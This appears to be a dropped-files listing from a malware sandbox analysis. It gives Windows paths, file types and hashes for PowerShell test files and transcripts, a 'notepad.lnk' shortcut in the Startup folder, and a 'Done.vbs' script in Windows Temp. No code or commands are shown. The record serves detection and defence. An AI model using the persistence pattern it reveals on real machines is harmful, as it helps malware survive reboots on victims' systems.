C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbmitrze.fya.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qct2mbdi.gzd.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yi3ekm1h.hmy.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqfb03wu.q5o.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\203a5f290b65cc8e.customDestinations-ms (copy)	data	17EC36702CE33E108FB2907B23E90137	1C58B4FA5B308B4F0390AB38C09506D6270949A1	B8FDC846BB6463E1B9C6CA231F1DC84070E666D4E117CF1CCAC15569FDD99DED
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GKHBRLNPJU0ODJT48OSA.temp	data	17EC36702CE33E108FB2907B23E90137	1C58B4FA5B308B4F0390AB38C09506D6270949A1	B8FDC846BB6463E1B9C6CA231F1DC84070E666D4E117CF1CCAC15569FDD99DED
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Wed Apr 11 22:35:26 2018, mtime=Sat May 28 03:15:50 2022, atime=Wed Apr 11 22:35:26 2018, length=447488, window=hidenormalshowminimized	5E9E2E97B51E8F7994A7479A353FF8AB	CB16EE465BC3EF1A87D8306D2A0B695CECB4C39D	D51BED157F561B78397B466C8B26E2FC0460DA40676241E7D7F8D9B39777CD25
C:\Users\user\Documents\20220527\PowerShell_transcript.936905.5h_PkwvK.20220527211608.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	A331C307AB4F6A59A353A911561E6C53	00717205D78700AA1C23D70A98A7FE9EA60836DD	EE14AC4EEF8803BE140411DFE62FEB59365778D5C055134A3E8620409EA37E82
C:\Users\user\Documents\20220527\PowerShell_transcript.936905.E1mPwf08.20220527211605.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	3AD280921C2A9823F96D0FCEB4F00EDF	FCCD9D9E27851210CA1132ED187288DAB49D56EA	F8430F0AC044EABD0689E03CD3497927602C851D8089B09D77FDDEE63D3F28E9
C:\Users\user\Documents\20220527\PowerShell_transcript.936905.g8PVW+ZW.20220527211543.txt	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	BCC1E34A4E4219032F89ED9FF3F8F705	4B2EB7E0B7E91785C11D7CD9D1053D4156CBF8EC	C2DF77FF5AF5F150F96067121C269DFD173AD082F1B1B09BCEE8F0B992DFE66C
C:\Users\user\Documents\20220527\PowerShell_transcript.936905.nOp+0WJ9.20220527211551.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	157763D395039E0FB31A84ECFBB0D663	2A998572C3B57177823F012729C2299025799BBD	F1E90EBA2A436E54E33FA79F393A377C15C9EF5106AB3D18F148F5ED4D814CD8
C:\Users\user\Documents\20220527\PowerShell_transcript.936905.niV_xjXk.20220527211529.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	DF1A7CF75107C2E58B701A35D37BA174	C394873703A41BC93825A3F525EF82F4BE50D7FF	4FB8BB0396FD231A4DBFE06556AF8983FC9EB58FA15465D0ACABFA318F28C23B
C:\Users\user\Documents\20220527\PowerShell_transcript.936905.zvvmzKz8.20220527211546.txt	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	6017C0D2E8B34ACAEAC6DF3BE641FC87	C3DA67F4D903726213228D4EF39CFDD23A775F90	745290EF532FFD113330766B7FA78C7B8C2E0D4B8BDD270AAFD0FB81079431D9
C:\Windows\Temp\Done.vbs	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators	DC70EEFA088F688D1CD4C4CF2C6674CA	C358867A468D9722B3C40F0BCD0CBE2534756545	1EC2C2C0A29C16146400C52880E887CFAE57223B2B621C0F433EF9B619AF5343